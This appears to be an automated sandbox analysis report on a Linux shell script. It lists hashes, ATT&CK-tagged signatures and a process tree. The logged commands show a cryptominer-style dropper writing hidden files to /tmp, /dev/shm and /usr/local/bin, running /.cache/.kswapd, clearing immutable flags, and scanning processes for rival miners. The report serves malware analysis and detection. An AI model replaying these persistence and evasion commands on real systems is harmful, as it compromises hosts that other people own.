eb5863ec076f38f68a8db2fceb316d07f621e87ba72bfca085a243a651686866

Analysis

max time kernel
121s
max time network
128s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
27/03/2025, 15:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
Size

5KB
MD5

7b72cf30ac42c20f0a14b0b87425c00a
SHA1

74402152ac0f0c9dfed6f76975080ce1d0d4584d
SHA256

80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514
SHA512

1587b6707b334800f2c4fa7d664542cda84a63c5534b4513003f786058b7d2ef6d22f0f18bdb3d6a81c6a4ea8897453592d4c9bcea0a2e2b62a47f325dbff5eb
SSDEEP

96:Dy0G/8yXwI7gzNnwNnP7fbunnbunJKDnWDnbJtgTGQFE/WztGz:Dw5XwKgRaTzUbUesdtgTGQFE/G8

Score

7^/10

defense_evasion discovery persistence

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 4 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
2422	chmod
1562	chmod
1986	chmod
1995	chmod

Executes dropped EXE 2 IoCs

ioc	pid	Process
/.cache/.kswapd	1987	80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
/.cache/.kswapd	2423	80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh

Attempts to change immutable files 64 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

pid	Process
1654	grep
1666	grep
2123	grep
2175	grep
2207	grep
2251	grep
2291	grep
1902	grep
2107	grep
2247	grep
1714	grep
1782	grep
1886	grep
2275	grep
1910	grep
1918	grep
1978	grep
1602	grep
1634	grep
2151	grep
2287	grep
1958	grep
1818	grep
1738	grep
2115	grep
2147	grep
2355	grep
1826	grep
2279	grep
2343	grep
2351	grep
1770	grep
1774	grep
2211	grep
2283	grep
2347	grep
1762	grep
1806	grep
1878	grep
2099	grep
2143	grep
1706	grep
1934	grep
2039	grep
2087	grep
2199	grep
2295	grep
2311	grep
1758	grep
1854	grep
1938	grep
1946	grep
2327	grep
2331	grep
2363	grep
1610	grep
1894	grep
1994	chattr
2079	grep
2119	grep
2127	grep
2179	grep
2395	grep
1630	grep

Enumerates running processes
Discovers information about currently running processes on the system

Write file to user bin folder 1 IoCs

persistence

description	ioc	Process
File opened for modification	/usr/local/bin/.jz2HKyZ	80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh

Reads CPU attributes 1 TTPs 6 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps

Process Discovery 1 TTPs 6 IoCs

Adversaries may try to discover information about running processes.

discovery

Process Discovery

T1057

pid	Process
1582	ps
1997	ps
2015	ps
1541	ps
1548	ps
1564	ps

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/1190/status	ps
File opened for reading	/proc/1330/stat	ps
File opened for reading	/proc/1507/status	ps
File opened for reading	/proc/31/stat	ps
File opened for reading	/proc/180/stat	ps
File opened for reading	/proc/185/status	ps
File opened for reading	/proc/11/cmdline	ps
File opened for reading	/proc/1384/status	ps
File opened for reading	/proc/1509/stat	ps
File opened for reading	/proc/31/status	ps
File opened for reading	/proc/656/status	ps
File opened for reading	/proc/682/cmdline	ps
File opened for reading	/proc/1092/cmdline	ps
File opened for reading	/proc/1558/cmdline	ps
File opened for reading	/proc/596/stat	ps
File opened for reading	/proc/14/status	ps
File opened for reading	/proc/82/stat	ps
File opened for reading	/proc/172/stat	ps
File opened for reading	/proc/28/cmdline	ps
File opened for reading	/proc/89/status	ps
File opened for reading	/proc/416/cmdline	ps
File opened for reading	/proc/7/cmdline	ps
File opened for reading	/proc/1578/cmdline	ps
File opened for reading	/proc/1051/cmdline	ps
File opened for reading	/proc/187/stat	ps
File opened for reading	/proc/79/cmdline	ps
File opened for reading	/proc/422/status	ps
File opened for reading	/proc/434/stat	ps
File opened for reading	/proc/462/status	ps
File opened for reading	/proc/1190/cmdline	ps
File opened for reading	/proc/1002/cmdline	ps
File opened for reading	/proc/1505/status	ps
File opened for reading	/proc/1330/stat	ps
File opened for reading	/proc/1330/status	ps
File opened for reading	/proc/1193/status	ps
File opened for reading	/proc/1384/status	ps
File opened for reading	/proc/84/stat	ps
File opened for reading	/proc/215/cmdline	ps
File opened for reading	/proc/1154/cmdline	ps
File opened for reading	/proc/1278/stat	ps
File opened for reading	/proc/1296/exe	grep
File opened for reading	/proc/186/stat	ps
File opened for reading	/proc/316/stat	ps
File opened for reading	/proc/27/stat	ps
File opened for reading	/proc/999/stat	ps
File opened for reading	/proc/1146/stat	ps
File opened for reading	/proc/175/cmdline	ps
File opened for reading	/proc/457/status	ps
File opened for reading	/proc/1137/cmdline	ps
File opened for reading	/proc/1167/stat	ps
File opened for reading	/proc/538/stat	ps
File opened for reading	/proc/1598/stat	ps
File opened for reading	/proc/281/status	ps
File opened for reading	/proc/10/status	ps
File opened for reading	/proc/12/status	ps
File opened for reading	/proc/81/status	ps
File opened for reading	/proc/179/cmdline	ps
File opened for reading	/proc/5/status	ps
File opened for reading	/proc/1160/stat	ps
File opened for reading	/proc/1/cmdline	ps
File opened for reading	/proc/79/status	ps
File opened for reading	/proc/1568/status	ps
File opened for reading	/proc/stat	ps
File opened for reading	/proc/183/cmdline	ps

Writes file to shm directory 1 IoCs

Malware can drop malicious files in the shm directory which will run directly from RAM.

description	ioc	Process
File opened for modification	/dev/shm/.jz2HKyZ	80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/.jz2HKyZ	80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh

/tmp/80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
/tmp/80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514.sh
1⤵
- Executes dropped EXE
- Write file to user bin folder
- Writes file to shm directory
- Writes file to tmp directory
PID:1512
- /bin/uname
  uname -a
  2⤵
  PID:1513
- /usr/bin/wc
  wc -l
  2⤵
  PID:1517
- /bin/grep
  grep " rm does not remove dir"
  2⤵
  PID:1516
- /bin/rm
  rm --help
  2⤵
  PID:1515
- /usr/bin/wc
  wc -l
  2⤵
  PID:1521
- /bin/grep
  grep -i "Dump libcurl equivalent"
  2⤵
  PID:1520
- /usr/bin/curl
  curl --help
  2⤵
  PID:1519
- /usr/bin/wc
  wc -l
  2⤵
  PID:1525
- /bin/grep
  grep -i "wgetrc "
  2⤵
  PID:1524
- /usr/bin/wget
  wget --version
  2⤵
  PID:1523
- /usr/bin/tr
  tr -dc A-Za-z0-9
  2⤵
  PID:1528
- /usr/bin/head
  head /dev/urandom
  2⤵
  PID:1527
- /usr/bin/shuf
  shuf -i 4-16 -n 1
  2⤵
  PID:1531
- /usr/bin/head
  head -c 7
  2⤵
  PID:1529
- /bin/rm
  rm -f /tmp/.jz2HKyZ
  2⤵
  PID:1535
- /bin/rm
  rm -f /tmp/.jz2HKyZ
  2⤵
  PID:1536
- /bin/rm
  rm -f /usr/local/bin/.jz2HKyZ
  2⤵
  PID:1537
- /bin/rm
  rm -f /dev/shm/.jz2HKyZ
  2⤵
  PID:1538
- /bin/rm
  rm -f /.jz2HKyZ
  2⤵
  PID:1539
- /usr/bin/wc
  wc -l
  2⤵
  PID:1546
- /bin/grep
  grep " sleep 120"
  2⤵
  PID:1545
- /bin/grep
  grep -v "sh "
  2⤵
  PID:1544
- /bin/grep
  grep -v defunct
  2⤵
  PID:1543
- /bin/grep
  grep -v grep
  2⤵
  PID:1542
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1541
- /bin/grep
  grep " sleep 120"
  2⤵
  PID:1552
- /bin/grep
  grep -v defunct
  2⤵
  PID:1551
- /usr/bin/wc
  wc -l
  2⤵
  PID:1553
- /bin/grep
  grep -v "sh "
  2⤵
  PID:1550
- /bin/grep
  grep -v grep
  2⤵
  PID:1549
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1548
- /bin/sleep
  sleep 120
  2⤵
  PID:1559
- /bin/mkdir
  mkdir -p /.cache/
  2⤵
  PID:1560
- /usr/bin/chattr
  chattr -i /.cache/
  2⤵
  PID:1561
- /bin/chmod
  chmod 1755 /.cache/
  2⤵
  - File and Directory Permissions Modification
  PID:1562
- /bin/grep
  grep -v eth1
  2⤵
  PID:1566
- /bin/grep
  grep -v lan0
  2⤵
  PID:1567
- /bin/grep
  grep -v "^-"
  2⤵
  PID:1568
- /bin/grep
  grep -v eth0
  2⤵
  PID:1569
- /bin/grep
  grep -v l0
  2⤵
  PID:1565
- /bin/grep
  grep -v inet0
  2⤵
  PID:1570
- /bin/grep
  grep -v lano
  2⤵
  PID:1571
- /bin/grep
  grep -v grep
  2⤵
  PID:1572
- /bin/grep
  grep -v defunct
  2⤵
  PID:1573
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1564
- /bin/grep
  grep -v knthread
  2⤵
  PID:1574
- /bin/grep
  grep -vi aaaaaaaaaa
  2⤵
  PID:1575
- /bin/grep
  grep -vi "java "
  2⤵
  PID:1576
- /bin/grep
  grep -vi jenkins
  2⤵
  PID:1577
- /bin/grep
  grep -vi exim
  2⤵
  PID:1578
- /usr/bin/awk
  awk "{if(\$3>=54.0) print \$11}"
  2⤵
  PID:1579
- /usr/bin/head
  head -n 1
  2⤵
  PID:1580
- /bin/grep
  grep -v lan0
  2⤵
  PID:1585
- /bin/grep
  grep -v "^-"
  2⤵
  PID:1586
- /bin/grep
  grep -v eth0
  2⤵
  PID:1587
- /bin/grep
  grep -v eth1
  2⤵
  PID:1584
- /bin/grep
  grep -v inet0
  2⤵
  PID:1588
- /bin/grep
  grep -v lano
  2⤵
  PID:1589
- /bin/grep
  grep -v l0
  2⤵
  PID:1583
- /bin/grep
  grep -v grep
  2⤵
  PID:1590
- /bin/grep
  grep -v defunct
  2⤵
  PID:1591
- /bin/grep
  grep -v python
  2⤵
  PID:1592
- /bin/grep
  grep -v knthread
  2⤵
  PID:1593
- /bin/grep
  grep -vi aaaaaaaaaa
  2⤵
  PID:1594
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1582
- /bin/grep
  grep -vi bash
  2⤵
  PID:1595
- /bin/grep
  grep -vi exim
  2⤵
  PID:1596
- /usr/bin/awk
  awk "{if(\$3>=0.0) print \$2}"
  2⤵
  PID:1597
- /usr/bin/uniq
  uniq
  2⤵
  PID:1598
- /bin/readlink
  readlink /proc/316/exe
  2⤵
  PID:1600
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/316/exe
  2⤵
  - Attempts to change immutable files
  PID:1602
- /bin/readlink
  readlink /proc/326/exe
  2⤵
  PID:1604
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/326/exe
  2⤵
  PID:1606
- /bin/readlink
  readlink /proc/416/exe
  2⤵
  PID:1608
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/416/exe
  2⤵
  - Attempts to change immutable files
  PID:1610
- /bin/readlink
  readlink /proc/418/exe
  2⤵
  PID:1612
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/418/exe
  2⤵
  PID:1614
- /bin/readlink
  readlink /proc/421/exe
  2⤵
  PID:1616
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/421/exe
  2⤵
  PID:1618
- /bin/readlink
  readlink /proc/422/exe
  2⤵
  PID:1620
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/422/exe
  2⤵
  PID:1622
- /bin/readlink
  readlink /proc/434/exe
  2⤵
  PID:1624
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/434/exe
  2⤵
  PID:1626
- /bin/readlink
  readlink /proc/440/exe
  2⤵
  PID:1628
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/440/exe
  2⤵
  - Attempts to change immutable files
  PID:1630
- /bin/readlink
  readlink /proc/442/exe
  2⤵
  PID:1632
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/442/exe
  2⤵
  - Attempts to change immutable files
  PID:1634
- /bin/readlink
  readlink /proc/457/exe
  2⤵
  PID:1636
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/457/exe
  2⤵
  PID:1638
- /bin/readlink
  readlink /proc/462/exe
  2⤵
  PID:1640
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/462/exe
  2⤵
  PID:1642
- /bin/readlink
  readlink /proc/464/exe
  2⤵
  PID:1644
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/464/exe
  2⤵
  PID:1646
- /bin/readlink
  readlink /proc/471/exe
  2⤵
  PID:1648
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/471/exe
  2⤵
  PID:1650
- /bin/readlink
  readlink /proc/476/exe
  2⤵
  PID:1652
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/476/exe
  2⤵
  - Attempts to change immutable files
  PID:1654
- /bin/readlink
  readlink /proc/485/exe
  2⤵
  PID:1656
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/485/exe
  2⤵
  PID:1658
- /bin/readlink
  readlink /proc/488/exe
  2⤵
  PID:1660
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/488/exe
  2⤵
  PID:1662
- /bin/readlink
  readlink /proc/538/exe
  2⤵
  PID:1664
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/538/exe
  2⤵
  - Attempts to change immutable files
  PID:1666
- /bin/readlink
  readlink /proc/539/exe
  2⤵
  PID:1668
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/539/exe
  2⤵
  PID:1670
- /bin/readlink
  readlink /proc/559/exe
  2⤵
  PID:1672
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/559/exe
  2⤵
  PID:1674
- /bin/readlink
  readlink /proc/572/exe
  2⤵
  PID:1676
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/572/exe
  2⤵
  PID:1678
- /bin/readlink
  readlink /proc/596/exe
  2⤵
  PID:1680
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/596/exe
  2⤵
  PID:1682
- /bin/readlink
  readlink /proc/615/exe
  2⤵
  PID:1684
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/615/exe
  2⤵
  PID:1686
- /bin/readlink
  readlink /proc/616/exe
  2⤵
  PID:1688
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/616/exe
  2⤵
  PID:1690
- /bin/readlink
  readlink /proc/656/exe
  2⤵
  PID:1692
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/656/exe
  2⤵
  PID:1694
- /bin/readlink
  readlink /proc/675/exe
  2⤵
  PID:1696
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/675/exe
  2⤵
  PID:1698
- /bin/readlink
  readlink /proc/678/exe
  2⤵
  PID:1700
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/678/exe
  2⤵
  PID:1702
- /bin/readlink
  readlink /proc/682/exe
  2⤵
  PID:1704
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/682/exe
  2⤵
  - Attempts to change immutable files
  PID:1706
- /bin/readlink
  readlink /proc/688/exe
  2⤵
  PID:1708
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/688/exe
  2⤵
  PID:1710
- /bin/readlink
  readlink /proc/693/exe
  2⤵
  PID:1712
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/693/exe
  2⤵
  - Attempts to change immutable files
  PID:1714
- /bin/readlink
  readlink /proc/701/exe
  2⤵
  PID:1716
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/701/exe
  2⤵
  PID:1718
- /bin/readlink
  readlink /proc/772/exe
  2⤵
  PID:1720
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/772/exe
  2⤵
  PID:1722
- /bin/readlink
  readlink /proc/793/exe
  2⤵
  PID:1724
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/793/exe
  2⤵
  PID:1726
- /bin/readlink
  readlink /proc/890/exe
  2⤵
  PID:1728
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/890/exe
  2⤵
  PID:1730
- /bin/readlink
  readlink /proc/930/exe
  2⤵
  PID:1732
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/930/exe
  2⤵
  PID:1734
- /bin/readlink
  readlink /proc/992/exe
  2⤵
  PID:1736
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/992/exe
  2⤵
  - Attempts to change immutable files
  PID:1738
- /bin/readlink
  readlink /proc/994/exe
  2⤵
  PID:1740
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/994/exe
  2⤵
  PID:1742
- /bin/readlink
  readlink /proc/999/exe
  2⤵
  PID:1744
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/999/exe
  2⤵
  PID:1746
- /bin/readlink
  readlink /proc/1002/exe
  2⤵
  PID:1748
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1002/exe
  2⤵
  PID:1750
- /bin/readlink
  readlink /proc/1026/exe
  2⤵
  PID:1752
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1026/exe
  2⤵
  PID:1754
- /bin/readlink
  readlink /proc/1031/exe
  2⤵
  PID:1756
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1031/exe
  2⤵
  - Attempts to change immutable files
  PID:1758
- /bin/readlink
  readlink /proc/1045/exe
  2⤵
  PID:1760
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1045/exe
  2⤵
  - Attempts to change immutable files
  PID:1762
- /bin/readlink
  readlink /proc/1051/exe
  2⤵
  PID:1764
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1051/exe
  2⤵
  PID:1766
- /bin/readlink
  readlink /proc/1064/exe
  2⤵
  PID:1768
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1064/exe
  2⤵
  - Attempts to change immutable files
  PID:1770
- /bin/readlink
  readlink /proc/1068/exe
  2⤵
  PID:1772
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1068/exe
  2⤵
  - Attempts to change immutable files
  PID:1774
- /bin/readlink
  readlink /proc/1072/exe
  2⤵
  PID:1776
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1072/exe
  2⤵
  PID:1778
- /bin/readlink
  readlink /proc/1075/exe
  2⤵
  PID:1780
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1075/exe
  2⤵
  - Attempts to change immutable files
  PID:1782
- /bin/readlink
  readlink /proc/1078/exe
  2⤵
  PID:1784
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1078/exe
  2⤵
  PID:1786
- /bin/readlink
  readlink /proc/1088/exe
  2⤵
  PID:1788
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1088/exe
  2⤵
  PID:1790
- /bin/readlink
  readlink /proc/1092/exe
  2⤵
  PID:1792
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1092/exe
  2⤵
  PID:1794
- /bin/readlink
  readlink /proc/1101/exe
  2⤵
  PID:1796
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1101/exe
  2⤵
  PID:1798
- /bin/readlink
  readlink /proc/1116/exe
  2⤵
  PID:1800
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1116/exe
  2⤵
  PID:1802
- /bin/readlink
  readlink /proc/1121/exe
  2⤵
  PID:1804
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1121/exe
  2⤵
  - Attempts to change immutable files
  PID:1806
- /bin/readlink
  readlink /proc/1125/exe
  2⤵
  PID:1808
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1125/exe
  2⤵
  PID:1810
- /bin/readlink
  readlink /proc/1129/exe
  2⤵
  PID:1812
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1129/exe
  2⤵
  PID:1814
- /bin/readlink
  readlink /proc/1133/exe
  2⤵
  PID:1816
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1133/exe
  2⤵
  - Attempts to change immutable files
  PID:1818
- /bin/readlink
  readlink /proc/1137/exe
  2⤵
  PID:1820
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1137/exe
  2⤵
  PID:1822
- /bin/readlink
  readlink /proc/1141/exe
  2⤵
  PID:1824
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1141/exe
  2⤵
  - Attempts to change immutable files
  PID:1826
- /bin/readlink
  readlink /proc/1146/exe
  2⤵
  PID:1828
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1146/exe
  2⤵
  PID:1830
- /bin/readlink
  readlink /proc/1150/exe
  2⤵
  PID:1832
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1150/exe
  2⤵
  PID:1834
- /bin/readlink
  readlink /proc/1151/exe
  2⤵
  PID:1836
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1151/exe
  2⤵
  PID:1838
- /bin/readlink
  readlink /proc/1154/exe
  2⤵
  PID:1840
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1154/exe
  2⤵
  PID:1842
- /bin/readlink
  readlink /proc/1156/exe
  2⤵
  PID:1844
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1156/exe
  2⤵
  PID:1846
- /bin/readlink
  readlink /proc/1160/exe
  2⤵
  PID:1848
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1160/exe
  2⤵
  PID:1850
- /bin/readlink
  readlink /proc/1167/exe
  2⤵
  PID:1852
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1167/exe
  2⤵
  - Attempts to change immutable files
  PID:1854
- /bin/readlink
  readlink /proc/1170/exe
  2⤵
  PID:1856
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1170/exe
  2⤵
  PID:1858
- /bin/readlink
  readlink /proc/1173/exe
  2⤵
  PID:1860
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1173/exe
  2⤵
  PID:1862
- /bin/readlink
  readlink /proc/1174/exe
  2⤵
  PID:1864
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1174/exe
  2⤵
  PID:1866
- /bin/readlink
  readlink /proc/1179/exe
  2⤵
  PID:1868
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1179/exe
  2⤵
  PID:1870
- /bin/readlink
  readlink /proc/1187/exe
  2⤵
  PID:1872
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1187/exe
  2⤵
  PID:1874
- /bin/readlink
  readlink /proc/1190/exe
  2⤵
  PID:1876
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1190/exe
  2⤵
  - Attempts to change immutable files
  PID:1878
- /bin/readlink
  readlink /proc/1191/exe
  2⤵
  PID:1880
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1191/exe
  2⤵
  PID:1882
- /bin/readlink
  readlink /proc/1192/exe
  2⤵
  PID:1884
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1192/exe
  2⤵
  - Attempts to change immutable files
  PID:1886
- /bin/readlink
  readlink /proc/1193/exe
  2⤵
  PID:1888
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1193/exe
  2⤵
  PID:1890
- /bin/readlink
  readlink /proc/1197/exe
  2⤵
  PID:1892
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1197/exe
  2⤵
  - Attempts to change immutable files
  PID:1894
- /bin/readlink
  readlink /proc/1200/exe
  2⤵
  PID:1896
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1200/exe
  2⤵
  PID:1898
- /bin/readlink
  readlink /proc/1232/exe
  2⤵
  PID:1900
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1232/exe
  2⤵
  - Attempts to change immutable files
  PID:1902
- /bin/readlink
  readlink /proc/1236/exe
  2⤵
  PID:1904
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1236/exe
  2⤵
  PID:1906
- /bin/readlink
  readlink /proc/1264/exe
  2⤵
  PID:1908
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1264/exe
  2⤵
  - Attempts to change immutable files
  PID:1910
- /bin/readlink
  readlink /proc/1265/exe
  2⤵
  PID:1912
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1265/exe
  2⤵
  PID:1914
- /bin/readlink
  readlink /proc/1278/exe
  2⤵
  PID:1916
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1278/exe
  2⤵
  - Attempts to change immutable files
  PID:1918
- /bin/readlink
  readlink /proc/1290/exe
  2⤵
  PID:1920
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1290/exe
  2⤵
  PID:1922
- /bin/readlink
  readlink /proc/1296/exe
  2⤵
  PID:1924
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1296/exe
  2⤵
  - Reads runtime system information
  PID:1926
- /bin/readlink
  readlink /proc/1306/exe
  2⤵
  PID:1928
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1306/exe
  2⤵
  PID:1930
- /bin/readlink
  readlink /proc/1313/exe
  2⤵
  PID:1932
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1313/exe
  2⤵
  - Attempts to change immutable files
  PID:1934
- /bin/readlink
  readlink /proc/1318/exe
  2⤵
  PID:1936
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1318/exe
  2⤵
  - Attempts to change immutable files
  PID:1938
- /bin/readlink
  readlink /proc/1340/exe
  2⤵
  PID:1940
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1340/exe
  2⤵
  PID:1942
- /bin/readlink
  readlink /proc/1355/exe
  2⤵
  PID:1944
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1355/exe
  2⤵
  - Attempts to change immutable files
  PID:1946
- /bin/readlink
  readlink /proc/1384/exe
  2⤵
  PID:1948
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1384/exe
  2⤵
  PID:1950
- /bin/readlink
  readlink /proc/1482/exe
  2⤵
  PID:1952
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1482/exe
  2⤵
  PID:1954
- /bin/readlink
  readlink /proc/1505/exe
  2⤵
  PID:1956
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1505/exe
  2⤵
  - Attempts to change immutable files
  PID:1958
- /bin/readlink
  readlink /proc/1507/cwd
  2⤵
  PID:1959
- /bin/cat
  cat /proc/1507/comm
  2⤵
  PID:1960
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" //kdumpy
  2⤵
  PID:1962
- /bin/readlink
  readlink /proc/1509/cwd
  2⤵
  PID:1963
- /bin/cat
  cat /proc/1509/comm
  2⤵
  PID:1964
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" //stahp_fdump
  2⤵
  PID:1966
- /bin/readlink
  readlink /proc/1510/cwd
  2⤵
  PID:1967
- /bin/cat
  cat /proc/1510/comm
  2⤵
  PID:1968
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" //stahp_vma
  2⤵
  PID:1970
- /bin/readlink
  readlink /proc/1555/exe
  2⤵
  PID:1972
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1555/exe
  2⤵
  PID:1974
- /bin/readlink
  readlink /proc/1559/exe
  2⤵
  PID:1976
- /bin/grep
  grep -i "xmr\\|cryptonight\\|hashrate" /proc/1559/exe
  2⤵
  - Attempts to change immutable files
  PID:1978
- /usr/bin/wc
  wc -l
  2⤵
  PID:1982
- /bin/grep
  grep x86_64
  2⤵
  PID:1981
- /usr/bin/curl
